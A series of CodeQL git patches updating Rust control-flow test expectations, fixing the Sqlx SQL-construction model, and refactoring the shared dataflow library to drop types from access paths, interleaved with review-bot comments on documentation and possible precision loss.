@@ -543,20 +543,20 @@ edges | variables.rs:253:14:253:35 | ...::Second(...) | variables.rs:253:9:253:10 | fv | | | variables.rs:253:33:253:34 | 62 | variables.rs:253:14:253:35 | ...::Second(...) | | | variables.rs:254:5:257:5 | match fv { ... } | variables.rs:252:21:258:1 | { ... } | | -| variables.rs:254:11:254:12 | fv | variables.rs:255:9:255:30 | TupleStructPat | | -| variables.rs:255:9:255:30 | TupleStructPat | variables.rs:255:27:255:29 | a13 | match | -| variables.rs:255:9:255:30 | TupleStructPat | variables.rs:255:35:255:57 | TupleStructPat | no-match | +| variables.rs:254:11:254:12 | fv | variables.rs:255:9:255:30 | ...::First(...) | | +| variables.rs:255:9:255:30 | ...::First(...) | variables.rs:255:27:255:29 | a13 | match | +| variables.rs:255:9:255:30 | ...::First(...) | variables.rs:255:35:255:57 | ...::Second(...) | no-match | | variables.rs:255:9:255:109 | [match(true)] ... \| ... \| ... | variables.rs:256:16:256:24 | print_i64 | match | | variables.rs:255:27:255:29 | a13 | variables.rs:255:9:255:109 | [match(true)] ... \| ... \| ... | match | -| variables.rs:255:35:255:57 | TupleStructPat | variables.rs:255:54:255:56 | a13 | match | -| variables.rs:255:35:255:57 | TupleStructPat | variables.rs:255:61:255:82 | TupleStructPat | no-match | -| variables.rs:255:35:255:82 | [match(false)] ... \| ... | variables.rs:255:87:255:109 | TupleStructPat | no-match | +| variables.rs:255:35:255:57 | ...::Second(...) | variables.rs:255:54:255:56 | a13 | match | +| variables.rs:255:35:255:57 | ...::Second(...) | variables.rs:255:61:255:82 | ...::Third(...) | no-match | +| variables.rs:255:35:255:82 | [match(false)] ... \| ... | variables.rs:255:87:255:109 | ...::Fourth(...) | no-match | | variables.rs:255:35:255:82 | [match(true)] ... \| ... | variables.rs:255:9:255:109 | [match(true)] ... \| ... \| ... | match | | variables.rs:255:54:255:56 | a13 | variables.rs:255:35:255:82 | [match(true)] ... \| ... 
| match | -| variables.rs:255:61:255:82 | TupleStructPat | variables.rs:255:35:255:82 | [match(false)] ... \| ... | no-match | -| variables.rs:255:61:255:82 | TupleStructPat | variables.rs:255:79:255:81 | a13 | match | +| variables.rs:255:61:255:82 | ...::Third(...) | variables.rs:255:35:255:82 | [match(false)] ... \| ... | no-match | +| variables.rs:255:61:255:82 | ...::Third(...) | variables.rs:255:79:255:81 | a13 | match | | variables.rs:255:79:255:81 | a13 | variables.rs:255:35:255:82 | [match(true)] ... \| ... | match | -| variables.rs:255:87:255:109 | TupleStructPat | variables.rs:255:106:255:108 | a13 | match | +| variables.rs:255:87:255:109 | ...::Fourth(...) | variables.rs:255:106:255:108 | a13 | match | | variables.rs:255:106:255:108 | a13 | variables.rs:255:9:255:109 | [match(true)] ... \| ... \| ... | match | | variables.rs:256:16:256:24 | print_i64 | variables.rs:256:26:256:28 | a13 | | | variables.rs:256:16:256:29 | print_i64(...) | variables.rs:254:5:257:5 | match fv { ... } | | 
@@ -582,14 +582,14 @@ edges | variables.rs:268:5:268:17 | print_str(...) | variables.rs:265:28:269:1 | { ... } | | | variables.rs:268:5:268:18 | ExprStmt | variables.rs:268:5:268:13 | print_str | | | variables.rs:268:15:268:16 | c1 | variables.rs:268:5:268:17 | print_str(...) | | -| variables.rs:271:1:275:1 | enter fn param_pattern2 | variables.rs:272:6:272:21 | TupleStructPat | | +| variables.rs:271:1:275:1 | enter fn param_pattern2 | variables.rs:272:6:272:21 | ...::Left(...) | | | variables.rs:271:1:275:1 | exit fn param_pattern2 (normal) | variables.rs:271:1:275:1 | exit fn param_pattern2 | | | variables.rs:272:5:272:50 | ...: Either | variables.rs:274:5:274:18 | ExprStmt | | -| variables.rs:272:6:272:21 | TupleStructPat | variables.rs:272:19:272:20 | a9 | match | -| variables.rs:272:6:272:21 | TupleStructPat | variables.rs:272:25:272:41 | TupleStructPat | no-match | +| variables.rs:272:6:272:21 | ...::Left(...) | variables.rs:272:19:272:20 | a9 | match | +| variables.rs:272:6:272:21 | ...::Left(...) | variables.rs:272:25:272:41 | ...::Right(...) | no-match | | variables.rs:272:6:272:41 | [match(true)] ... \| ... | variables.rs:272:5:272:50 | ...: Either | match | | variables.rs:272:19:272:20 | a9 | variables.rs:272:6:272:41 | [match(true)] ... \| ... | match | -| variables.rs:272:25:272:41 | TupleStructPat | variables.rs:272:39:272:40 | a9 | match | +| variables.rs:272:25:272:41 | ...::Right(...) | variables.rs:272:39:272:40 | a9 | match | | variables.rs:272:39:272:40 | a9 | variables.rs:272:6:272:41 | [match(true)] ... \| ... | match | | variables.rs:273:9:275:1 | { ... } | variables.rs:271:1:275:1 | exit fn param_pattern2 (normal) | | | variables.rs:274:5:274:13 | print_i64 | variables.rs:274:15:274:16 | a9 | | From 6a8188f8eb196f16faab1f3309e8537bb1847657 Mon Sep 17 00:00:00 2001 
From: Paolo Tranquilli Date: Mon, 2 Dec 2024 08:30:16 +0100 Subject: [PATCH 0770/1267] Rust: fix QL compilation errors after merge from main --- rust/ql/lib/codeql/rust/frameworks/Sqlx.qll | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rust/ql/lib/codeql/rust/frameworks/Sqlx.qll b/rust/ql/lib/codeql/rust/frameworks/Sqlx.qll index f00c7375448..5504993ab74 100644 --- a/rust/ql/lib/codeql/rust/frameworks/Sqlx.qll +++ b/rust/ql/lib/codeql/rust/frameworks/Sqlx.qll @@ -14,7 +14,7 @@ private class SqlxQuery extends SqlConstruction::Range { SqlxQuery() { this.asExpr().getExpr() = call and - call.getFunction().(PathExpr).getPath().getResolvedPath() = + call.getFunction().(PathExpr).getResolvedPath() = [ "crate::query::query", "crate::query_as::query_as", "crate::query_with::query_with", "crate::query_as_with::query_as_with", "crate::query_scalar::query_scalar", From 70a8bc302ccb129e1b6808dd7fee64723e385147 Mon Sep 17 00:00:00 2001 From: Anders Schack-Mulligen Date: Mon, 2 Dec 2024 12:48:19 +0100 Subject: [PATCH 0771/1267] Dataflow: Rename typecheckStore. --- .../codeql/dataflow/internal/DataFlowImpl.qll | 36 ++++++++----------- 1 file changed, 15 insertions(+), 21 deletions(-) diff --git a/shared/dataflow/codeql/dataflow/internal/DataFlowImpl.qll b/shared/dataflow/codeql/dataflow/internal/DataFlowImpl.qll index 96184a607f0..b090832647a 100644 --- a/shared/dataflow/codeql/dataflow/internal/DataFlowImpl.qll +++ b/shared/dataflow/codeql/dataflow/internal/DataFlowImpl.qll @@ -1410,8 +1410,8 @@ module MakeImpl Lang> { bindingset[node, ap, isStoreStep] predicate stepFilter(NodeEx node, Ap ap, boolean isStoreStep); - bindingset[typ, contentType] - predicate typecheckStore(Typ typ, DataFlowType contentType); + bindingset[t1, t2] + predicate typecheck(Typ t1, Typ t2); default predicate enableTypeFlow() { any() } } 
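Review bot: The strings compared with `getResolvedPath()` in the `SqlxQuery` constructor are crate-relative (`"crate::query::query"`, `"crate::query_as::query_as"`, …), and nothing in the visible lines restricts the match to calls that resolve into the sqlx crate. If the full class has no such restriction, a function with the same module path in another crate would presumably be modelled as SQL construction too, adding noise to the injection results. I would either add a conjunct on the crate the path resolved in, or record the assumption with a comment such as `// resolved paths are relative to the root of the sqlx crate`. The class body and the rest of the path list lie outside this hunk.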
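Review bot: The renamed signature predicate `typecheck(Typ t1, Typ t2)` in the `@@ -1410` hunk has no QLDoc, and the new name no longer says which two types are compared or what holding means. The later hunks of this commit implement it as `any()` in the early stages and as `compatibleTypesFilter(t1, t2)` in the later ones. A line such as `/** Holds if t1 and t2 are compatible; stages that do not track types use any(). */` above the declaration would cover both. The signature block starts and ends outside this hunk.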
@@ -1641,7 +1641,9 @@ module MakeImpl Lang> { not inBarrier(node2, state) and PrevStage::storeStepCand(node1, apa1, c, node2, contentType, containerType) and t2 = getTyp(containerType) and - typecheckStore(t1, contentType) + // We need to typecheck stores here, since reverse flow through a getter + // might have a different type here compared to inside the getter. + typecheck(t1, getTyp(contentType)) ) } @@ -3742,8 +3744,8 @@ module MakeImpl Lang> { bindingset[node, ap, isStoreStep] predicate stepFilter(NodeEx node, Ap ap, boolean isStoreStep) { any() } - bindingset[typ, contentType] - predicate typecheckStore(Typ typ, DataFlowType contentType) { any() } + bindingset[t1, t2] + predicate typecheck(Typ t1, Typ t2) { any() } predicate enableTypeFlow() { none() } } @@ -3855,8 +3857,8 @@ module MakeImpl Lang> { bindingset[node, ap, isStoreStep] predicate stepFilter(NodeEx node, Ap ap, boolean isStoreStep) { any() } - bindingset[typ, contentType] - predicate typecheckStore(Typ typ, DataFlowType contentType) { any() } + bindingset[t1, t2] + predicate typecheck(Typ t1, Typ t2) { any() } } private module Stage3 = MkStage::Stage; @@ -3975,12 +3977,8 @@ module MakeImpl Lang> { if clearExceptStore(node, ap) then isStoreStep = true else any() } - bindingset[typ, contentType] - predicate typecheckStore(Typ typ, DataFlowType contentType) { - // We need to typecheck stores here, since reverse flow through a getter - // might have a different type here compared to inside the getter. - compatibleTypesFilter(typ, contentType) - } + bindingset[t1, t2] + predicate typecheck(Typ t1, Typ t2) { compatibleTypesFilter(t1, t2) } } private module Stage4 = MkStage::Stage; 
@@ -4227,10 +4225,8 @@ module MakeImpl Lang> { if clearExceptStore(node, ap) then isStoreStep = true else any() } - bindingset[typ, contentType] - predicate typecheckStore(Typ typ, DataFlowType contentType) { - compatibleTypesFilter(typ, contentType) - } + bindingset[t1, t2] + predicate typecheck(Typ t1, Typ t2) { compatibleTypesFilter(t1, t2) } } private module Stage5 = MkStage::Stage; @@ -4426,10 +4422,8 @@ module MakeImpl Lang> { if clearExceptStore(node, ap) then isStoreStep = true else any() } - bindingset[typ, contentType] - predicate typecheckStore(Typ typ, DataFlowType contentType) { - compatibleTypesFilter(typ, contentType) - } + bindingset[t1, t2] + predicate typecheck(Typ t1, Typ t2) { compatibleTypesFilter(t1, t2) } } module Stage6 = MkStage::Stage; From 5d13d3b43416f4b6a88d0d76fcf26378597e7a6d Mon Sep 17 00:00:00 2001 From: Anders Schack-Mulligen Date: Mon, 2 Dec 2024 13:02:33 +0100 Subject: [PATCH 0772/1267] Dataflow: Refactor - deduplicate fwdFlowRead+consCand join. --- .../codeql/dataflow/internal/DataFlowImpl.qll | 28 ++++++++++--------- 1 file changed, 15 insertions(+), 13 deletions(-) diff --git a/shared/dataflow/codeql/dataflow/internal/DataFlowImpl.qll b/shared/dataflow/codeql/dataflow/internal/DataFlowImpl.qll index b090832647a..0c5fec9a936 100644 --- a/shared/dataflow/codeql/dataflow/internal/DataFlowImpl.qll +++ b/shared/dataflow/codeql/dataflow/internal/DataFlowImpl.qll @@ -1533,11 +1533,8 @@ module MakeImpl Lang> { ) or // read - exists(Typ t0, Ap ap0, Content c | - fwdFlowRead(t0, ap0, c, _, node, state, cc, summaryCtx) and - fwdFlowConsCand(t0, ap0, c, t, ap) and - apa = getApprox(ap) - ) + fwdFlowRead(_, _, _, _, node, t, ap, state, cc, summaryCtx) and + apa = getApprox(ap) or // flow into a callable without summary context fwdFlowInNoFlowThrough(node, apa, state, cc, t, ap) and 
@@ -1676,7 +1673,7 @@ module MakeImpl Lang> { } pragma[nomagic] - private predicate fwdFlowRead( + private predicate fwdFlowRead0( Typ t, Ap ap, Content c, NodeEx node1, NodeEx node2, FlowState state, Cc cc, SummaryCtx summaryCtx ) { @@ -1689,6 +1686,15 @@ module MakeImpl Lang> { ) } + pragma[nomagic] + private predicate fwdFlowRead( + NodeEx node1, Typ t1, Ap ap1, Content c, NodeEx node2, Typ t2, Ap ap2, FlowState state, + Cc cc, SummaryCtx summaryCtx + ) { + fwdFlowRead0(t1, ap1, c, node1, node2, state, cc, summaryCtx) and + fwdFlowConsCand(t1, ap1, c, t2, ap2) + } + pragma[nomagic] private predicate fwdFlowIntoArg( ArgNodeEx arg, FlowState state, Cc outercc, SummaryCtx summaryCtx, Typ t, Ap ap, @@ -2127,10 +2133,7 @@ module MakeImpl Lang> { pragma[nomagic] private predicate readStepFwd(NodeEx n1, Ap ap1, Content c, NodeEx n2, Ap ap2) { - exists(Typ t1 | - fwdFlowRead(t1, ap1, c, n1, n2, _, _, _) and - fwdFlowConsCand(t1, ap1, c, _, ap2) - ) + fwdFlowRead(n1, _, ap1, c, n2, _, ap2, _, _, _) } pragma[nomagic] @@ -3200,10 +3203,9 @@ module MakeImpl Lang> { ) or // read - exists(NodeEx mid, Typ t0, Ap ap0, Content c | + exists(NodeEx mid, Typ t0, Ap ap0 | pn1 = TPathNodeMid(mid, state, cc, summaryCtx, t0, ap0) and - fwdFlowRead(t0, ap0, c, mid, node, state, cc, summaryCtx) and - fwdFlowConsCand(t0, ap0, c, t, ap) and + fwdFlowRead(mid, t0, ap0, _, node, t, ap, state, cc, summaryCtx) and label = "" and isStoreStep = false ) From e9bd1e5b79cd106899f64c41e249dde20fdbcd65 Mon Sep 17 00:00:00 2001 From: Anders Schack-Mulligen Date: Mon, 2 Dec 2024 13:31:51 +0100 Subject: [PATCH 0773/1267] Dataflow: Remove types from access paths. --- .../codeql/dataflow/internal/DataFlowImpl.qll | 220 ++++++++---------- 1 file changed, 95 insertions(+), 125 deletions(-) diff --git a/shared/dataflow/codeql/dataflow/internal/DataFlowImpl.qll b/shared/dataflow/codeql/dataflow/internal/DataFlowImpl.qll index 0c5fec9a936..084d9976f9f 100644 
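Review bot: The new ten-parameter `fwdFlowRead` added in the `@@ -1689` hunk has no QLDoc and orders its arguments differently from `fwdFlowRead0` (`node1, t1, ap1, c, node2, t2, ap2, …` against `t, ap, c, node1, node2, …`). Call sites such as `fwdFlowRead(_, _, _, _, node, t, ap, state, cc, summaryCtx)` pass several `_` in a row, so a misplaced argument is easy to miss in review. I would add `/** Holds if reading c takes flow at node1 (type t1, access path ap1) to node2 (type t2, access path ap2). */` above the predicate. Giving `fwdFlowRead0` the same leading order would make the two easier to read side by side.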
--- a/shared/dataflow/codeql/dataflow/internal/DataFlowImpl.qll +++ b/shared/dataflow/codeql/dataflow/internal/DataFlowImpl.qll @@ -1330,8 +1330,8 @@ module MakeImpl Lang> { Typ getTyp(DataFlowType t); - bindingset[c, t, tail] - Ap apCons(Content c, Typ t, Ap tail); + bindingset[c, tail] + Ap apCons(Content c, Ap tail); /** * An approximation of `Content` that corresponds to the precision level of @@ -1494,11 +1494,6 @@ module MakeImpl Lang> { ) } - pragma[nomagic] - private predicate typeStrengthen(Typ t0, Ap ap, Typ t) { - fwdFlow1(_, _, _, _, t0, t, ap, _) and t0 != t - } - pragma[nomagic] private predicate fwdFlow0( NodeEx node, FlowState state, Cc cc, SummaryCtx summaryCtx, Typ t, Ap ap, ApApprox apa @@ -1526,9 +1521,9 @@ module MakeImpl Lang> { summaryCtx = TSummaryCtxNone() or // store - exists(Content c, Typ t0, Ap ap0 | - fwdFlowStore(_, t0, ap0, c, t, node, state, cc, summaryCtx) and - ap = apCons(c, t0, ap0) and + exists(Content c, Ap ap0 | + fwdFlowStore(_, _, ap0, c, t, node, state, cc, summaryCtx) and + ap = apCons(c, ap0) and apa = getApprox(ap) ) or @@ -1652,12 +1647,7 @@ module MakeImpl Lang> { pragma[nomagic] private predicate fwdFlowConsCand(Typ t2, Ap cons, Content c, Typ t1, Ap tail) { fwdFlowStore(_, t1, tail, c, t2, _, _, _, _) and - cons = apCons(c, t1, tail) - or - exists(Typ t0 | - typeStrengthen(t0, cons, t2) and - fwdFlowConsCand(t0, cons, c, t1, tail) - ) + cons = apCons(c, tail) } pragma[nomagic] @@ -2125,9 +2115,9 @@ module MakeImpl Lang> { } pragma[nomagic] - private predicate storeStepFwd(NodeEx node1, Typ t1, Ap ap1, Content c, NodeEx node2, Ap ap2) { - fwdFlowStore(node1, t1, ap1, c, _, node2, _, _, _) and - ap2 = apCons(c, t1, ap1) and + private predicate storeStepFwd(NodeEx node1, Ap ap1, Content c, NodeEx node2, Ap ap2) { + fwdFlowStore(node1, _, ap1, c, _, node2, _, _, _) and + ap2 = apCons(c, ap1) and readStepFwd(_, ap2, c, _, _) } 
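Review bot: After the `@@ -1652` hunk, `fwdFlowConsCand(Typ t2, Ap cons, …)` holds only for the container type `t2` that `fwdFlowStore` recorded, because the `typeStrengthen` disjunct is dropped here and the predicate itself is deleted in the `@@ -1494` hunk. `fwdFlow1` still lets `filter` replace `t0` by a different `t`, and `fwdFlowRead` joins `fwdFlowConsCand` on the type at the read node. As far as these lines show, a read that follows a strengthened container type would no longer find its cons candidate and the flow would be dropped, which for taint queries means missed results. If a later commit in the series removes the container type from this join, say so in the commit message; otherwise keep the disjunct and `typeStrengthen` until then.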
@@ -2247,7 +2237,7 @@ module MakeImpl Lang> { or // store exists(Ap ap0, Content c | - revFlowStore(ap0, c, ap, _, node, state, _, returnCtx, returnAp) and + revFlowStore(ap0, c, ap, node, state, _, returnCtx, returnAp) and revFlowConsCand(ap0, c, ap) ) or @@ -2302,11 +2292,11 @@ module MakeImpl Lang> { pragma[nomagic] private predicate revFlowStore( - Ap ap0, Content c, Ap ap, Typ t, NodeEx node, FlowState state, NodeEx mid, - ReturnCtx returnCtx, ApOption returnAp + Ap ap0, Content c, Ap ap, NodeEx node, FlowState state, NodeEx mid, ReturnCtx returnCtx, + ApOption returnAp ) { revFlow(mid, state, returnCtx, returnAp, ap0) and - storeStepFwd(node, t, ap, c, mid, ap0) + storeStepFwd(node, ap, c, mid, ap0) } /** @@ -2445,7 +2435,7 @@ module MakeImpl Lang> { ) { exists(Ap ap2 | PrevStage::storeStepCand(node1, _, c, node2, contentType, containerType) and - revFlowStore(ap2, c, ap1, _, node1, _, node2, _, _) and + revFlowStore(ap2, c, ap1, node1, _, node2, _, _) and revFlowConsCand(ap2, c, ap1) ) } @@ -2454,7 +2444,7 @@ module MakeImpl Lang> { exists(Ap ap1, Ap ap2 | revFlow(node2, _, _, _, pragma[only_bind_into](ap2)) and readStepFwd(node1, ap1, c, node2, ap2) and - revFlowStore(ap1, c, pragma[only_bind_into](ap2), _, _, _, _, _, _) + revFlowStore(ap1, c, pragma[only_bind_into](ap2), _, _, _, _, _) ) } @@ -2468,11 +2458,11 @@ module MakeImpl Lang> { pragma[nomagic] predicate revFlowAp(NodeEx node, Ap ap) { revFlow(node, _, _, _, ap) } - private predicate fwdConsCand(Content c, Typ t, Ap ap) { storeStepFwd(_, t, ap, c, _, _) } + private predicate fwdConsCand(Content c, Ap ap) { storeStepFwd(_, ap, c, _, _) } - private predicate revConsCand(Content c, Typ t, Ap ap) { + private predicate revConsCand(Content c, Ap ap) { exists(Ap ap2 | - revFlowStore(ap2, c, ap, t, _, _, _, _, _) and + revFlowStore(ap2, c, ap, _, _, _, _, _) and revFlowConsCand(ap2, c, ap) ) } 
@@ -2480,14 +2470,14 @@ module MakeImpl Lang> { private predicate validAp(Ap ap) { revFlow(_, _, _, _, ap) and ap instanceof ApNil or - exists(Content head, Typ t, Ap tail | - consCand(head, t, tail) and - ap = apCons(head, t, tail) + exists(Content head, Ap tail | + consCand(head, tail) and + ap = apCons(head, tail) ) } - additional predicate consCand(Content c, Typ t, Ap ap) { - revConsCand(c, t, ap) and + additional predicate consCand(Content c, Ap ap) { + revConsCand(c, ap) and validAp(ap) } @@ -3197,7 +3187,7 @@ module MakeImpl Lang> { exists(NodeEx mid, Content c, Typ t0, Ap ap0 | pn1 = TPathNodeMid(mid, state, cc, summaryCtx, t0, ap0) and fwdFlowStore(mid, t0, ap0, c, t, node, state, cc, summaryCtx) and - ap = apCons(c, t0, ap0) and + ap = apCons(c, ap0) and label = "" and isStoreStep = true ) @@ -3584,8 +3574,8 @@ module MakeImpl Lang> { ) { fwd = true and nodes = count(NodeEx node | fwdFlow(node, _, _, _, _, _, _)) and - fields = count(Content f0 | fwdConsCand(f0, _, _)) and - conscand = count(Content f0, Typ t, Ap ap | fwdConsCand(f0, t, ap)) and + fields = count(Content f0 | fwdConsCand(f0, _)) and + conscand = count(Content f0, Ap ap | fwdConsCand(f0, ap)) and states = count(FlowState state | fwdFlow(_, state, _, _, _, _, _)) and tuples = count(NodeEx n, FlowState state, Cc cc, SummaryCtx summaryCtx, Typ t, Ap ap | @@ -3600,8 +3590,8 @@ module MakeImpl Lang> { or fwd = false and nodes = count(NodeEx node | revFlow(node, _, _, _, _)) and - fields = count(Content f0 | consCand(f0, _, _)) and - conscand = count(Content f0, Typ t, Ap ap | consCand(f0, t, ap)) and + fields = count(Content f0 | consCand(f0, _)) and + conscand = count(Content f0, Ap ap | consCand(f0, ap)) and states = count(FlowState state | revFlow(_, state, _, _, _)) and tuples = count(NodeEx n, FlowState state, ReturnCtx returnCtx, ApOption retAp, Ap ap | 
@@ -3679,11 +3669,10 @@ module MakeImpl Lang> { Typ getTyp(DataFlowType t) { any() } - bindingset[c, t, tail] - Ap apCons(Content c, Typ t, Ap tail) { + bindingset[c, tail] + Ap apCons(Content c, Ap tail) { result = true and exists(c) and - exists(t) and if tail = true then Config::accessPathLimit() > 1 else any() } @@ -3767,8 +3756,8 @@ module MakeImpl Lang> { Typ getTyp(DataFlowType t) { any() } - bindingset[c, t, tail] - Ap apCons(Content c, Typ t, Ap tail) { result.getAHead() = c and exists(t) and exists(tail) } + bindingset[c, tail] + Ap apCons(Content c, Ap tail) { result.getAHead() = c and exists(tail) } class ApHeadContent = ContentApprox; @@ -3892,8 +3881,8 @@ module MakeImpl Lang> { Typ getTyp(DataFlowType t) { result = t } - bindingset[c, t, tail] - Ap apCons(Content c, Typ t, Ap tail) { result.getHead() = c and exists(t) and exists(tail) } + bindingset[c, tail] + Ap apCons(Content c, Ap tail) { result.getHead() = c and exists(tail) } class ApHeadContent = Content; @@ -3991,7 +3980,7 @@ module MakeImpl Lang> { */ private predicate expensiveLen2unfolding(Content c) { exists(int tails, int nodes, int apLimit, int tupleLimit | - tails = strictcount(DataFlowType t, AccessPathFront apf | Stage4::consCand(c, t, apf)) and + tails = strictcount(AccessPathFront apf | Stage4::consCand(c, apf)) and nodes = strictcount(NodeEx n, FlowState state | Stage4::revFlow(n, state, any(AccessPathFrontHead apf | apf.getHead() = c)) @@ -4007,12 +3996,12 @@ module MakeImpl Lang> { private newtype TAccessPathApprox = TNil() or - TConsNil(Content c, DataFlowType t) { - Stage4::consCand(c, t, TFrontNil()) and + TConsNil(Content c) { + Stage4::consCand(c, TFrontNil()) and not expensiveLen2unfolding(c) } or - TConsCons(Content c1, DataFlowType t, Content c2, int len) { - Stage4::consCand(c1, t, TFrontHead(c2)) and + TConsCons(Content c1, Content c2, int len) { + Stage4::consCand(c1, TFrontHead(c2)) and len in [2 .. Config::accessPathLimit()] and not expensiveLen2unfolding(c1) } or 
@@ -4022,12 +4011,11 @@ module MakeImpl Lang> { } /** - * Conceptually a list of `Content`s where nested tails are also paired with a - * `DataFlowType`, but only the first two elements of the list and its length - * are tracked. If data flows from a source to a given node with a given - * `AccessPathApprox`, this indicates the sequence of dereference operations - * needed to get from the value in the node to the tracked object. The - * `DataFlowType`s indicate the types of the stored values. + * Conceptually a list of `Content`s, but only the first two elements of + * the list and its length are tracked. If data flows from a source to a + * given node with a given `AccessPathApprox`, this indicates the sequence + * of dereference operations needed to get from the value in the node to + * the tracked object. */ abstract private class AccessPathApprox extends TAccessPathApprox { abstract string toString(); @@ -4038,8 +4026,8 @@ module MakeImpl Lang> { abstract AccessPathFront getFront(); - /** Holds if this is a representation of `head` followed by the `typ,tail` pair. */ - abstract predicate isCons(Content head, DataFlowType typ, AccessPathApprox tail); + /** Holds if this is a representation of `head` followed by `tail`. */ + abstract predicate isCons(Content head, AccessPathApprox tail); } private class AccessPathApproxNil extends AccessPathApprox, TNil { 
@@ -4051,23 +4039,17 @@ module MakeImpl Lang> { override AccessPathFront getFront() { result = TFrontNil() } - override predicate isCons(Content head, DataFlowType typ, AccessPathApprox tail) { none() } + override predicate isCons(Content head, AccessPathApprox tail) { none() } } abstract private class AccessPathApproxCons extends AccessPathApprox { } private class AccessPathApproxConsNil extends AccessPathApproxCons, TConsNil { private Content c; - private DataFlowType t; - AccessPathApproxConsNil() { this = TConsNil(c, t) } + AccessPathApproxConsNil() { this = TConsNil(c) } - private string ppTyp() { result = t.toString() and result != "" } - - override string toString() { - // The `concat` becomes "" if `ppTyp` has no result. - result = "[" + c.toString() + "]" + concat(" : " + this.ppTyp()) - } + override string toString() { result = "[" + c.toString() + "]" } override Content getHead() { result = c } @@ -4075,18 +4057,15 @@ module MakeImpl Lang> { override AccessPathFront getFront() { result = TFrontHead(c) } - override predicate isCons(Content head, DataFlowType typ, AccessPathApprox tail) { - head = c and typ = t and tail = TNil() - } + override predicate isCons(Content head, AccessPathApprox tail) { head = c and tail = TNil() } } private class AccessPathApproxConsCons extends AccessPathApproxCons, TConsCons { private Content c1; - private DataFlowType t; private Content c2; private int len; - AccessPathApproxConsCons() { this = TConsCons(c1, t, c2, len) } + AccessPathApproxConsCons() { this = TConsCons(c1, c2, len) } override string toString() { if len = 2 
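Review bot: `AccessPathApproxConsNil.toString()` in the `@@ -4051` hunk now returns `"[" + c.toString() + "]"` without the ` : type` suffix that `ppTyp()` used to append, and `AccessPathCons.toStringImpl` loses the same suffix in the `@@ -4473` hunk. If these strings feed the labels of path nodes, which the visible lines do not show, every rendered path with a non-empty access path changes, while the diffstat of this commit lists only `DataFlowImpl.qll`. I would state in the commit message whether the label change is intended and whether a later commit restores the type, so that expected-output changes can be traced back to it.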
@@ -4100,14 +4079,13 @@ module MakeImpl Lang> { override AccessPathFront getFront() { result = TFrontHead(c1) } - override predicate isCons(Content head, DataFlowType typ, AccessPathApprox tail) { + override predicate isCons(Content head, AccessPathApprox tail) { head = c1 and - typ = t and ( - tail = TConsCons(c2, _, _, len - 1) + tail = TConsCons(c2, _, len - 1) or len = 2 and - tail = TConsNil(c2, _) + tail = TConsNil(c2) or tail = TCons1(c2, len - 1) ) @@ -4132,20 +4110,20 @@ module MakeImpl Lang> { override AccessPathFront getFront() { result = TFrontHead(c) } - override predicate isCons(Content head, DataFlowType typ, AccessPathApprox tail) { + override predicate isCons(Content head, AccessPathApprox tail) { head = c and ( - exists(Content c2 | Stage4::consCand(c, typ, TFrontHead(c2)) | - tail = TConsCons(c2, _, _, len - 1) + exists(Content c2 | Stage4::consCand(c, TFrontHead(c2)) | + tail = TConsCons(c2, _, len - 1) or len = 2 and - tail = TConsNil(c2, _) + tail = TConsNil(c2) or tail = TCons1(c2, len - 1) ) or len = 1 and - Stage4::consCand(c, typ, TFrontNil()) and + Stage4::consCand(c, TFrontNil()) and tail = TNil() ) } @@ -4177,8 +4155,8 @@ module MakeImpl Lang> { Typ getTyp(DataFlowType t) { result = t } - bindingset[c, t, tail] - Ap apCons(Content c, Typ t, Ap tail) { result.isCons(c, t, tail) } + bindingset[c, tail] + Ap apCons(Content c, Ap tail) { result.isCons(c, tail) } class ApHeadContent = Content; @@ -4234,8 +4212,8 @@ module MakeImpl Lang> { private module Stage5 = MkStage::Stage; pragma[nomagic] - private predicate stage5ConsCand(Content c, DataFlowType t, AccessPathFront apf, int len) { - Stage5::consCand(c, t, any(AccessPathApprox ap | ap.getFront() = apf and ap.len() = len - 1)) + private predicate stage5ConsCand(Content c, AccessPathFront apf, int len) { + Stage5::consCand(c, any(AccessPathApprox ap | ap.getFront() = apf and ap.len() = len - 1)) } /** 
@@ -4245,7 +4223,7 @@ module MakeImpl Lang> { exists(Content c, int len | c = apa.getHead() and len = apa.len() and - result = strictcount(DataFlowType t, AccessPathFront apf | stage5ConsCand(c, t, apf, len)) + result = strictcount(AccessPathFront apf | stage5ConsCand(c, apf, len)) ) } @@ -4270,10 +4248,10 @@ module MakeImpl Lang> { ) } - private predicate hasTail(AccessPathApprox apa, DataFlowType t, AccessPathApprox tail) { + private predicate hasTail(AccessPathApprox apa, AccessPathApprox tail) { exists(Content head | - apa.isCons(head, t, tail) and - Stage5::consCand(head, t, tail) + apa.isCons(head, tail) and + Stage5::consCand(head, tail) ) } @@ -4281,7 +4259,7 @@ module MakeImpl Lang> { forceHighPrecision(apa.getHead()) or exists(Content c2 | - apa = TConsCons(_, _, c2, _) and + apa = TConsCons(_, c2, _) and forceHighPrecision(c2) ) } @@ -4326,25 +4304,24 @@ module MakeImpl Lang> { private int countPotentialAps(AccessPathApprox apa) { apa instanceof AccessPathApproxNil and result = 1 or - result = - strictsum(DataFlowType t, AccessPathApprox tail | hasTail(apa, t, tail) | countAps(tail)) + result = strictsum(AccessPathApprox tail | hasTail(apa, tail) | countAps(tail)) } private newtype TAccessPath = TAccessPathNil() or - TAccessPathCons(Content head, DataFlowType t, AccessPath tail) { + TAccessPathCons(Content head, AccessPath tail) { exists(AccessPathApproxCons apa | not evalUnfold(apa, false) and head = apa.getHead() and - hasTail(apa, t, tail.getApprox()) + hasTail(apa, tail.getApprox()) ) } or - TAccessPathCons2(Content head1, DataFlowType t, Content head2, int len) { + TAccessPathCons2(Content head1, Content head2, int len) { exists(AccessPathApproxCons apa, AccessPathApprox tail | evalUnfold(apa, false) and not expensiveLen1to2unfolding(apa) and apa.len() = len and - hasTail(apa, t, tail) and + hasTail(apa, tail) and head1 = apa.getHead() and head2 = tail.getHead() ) 
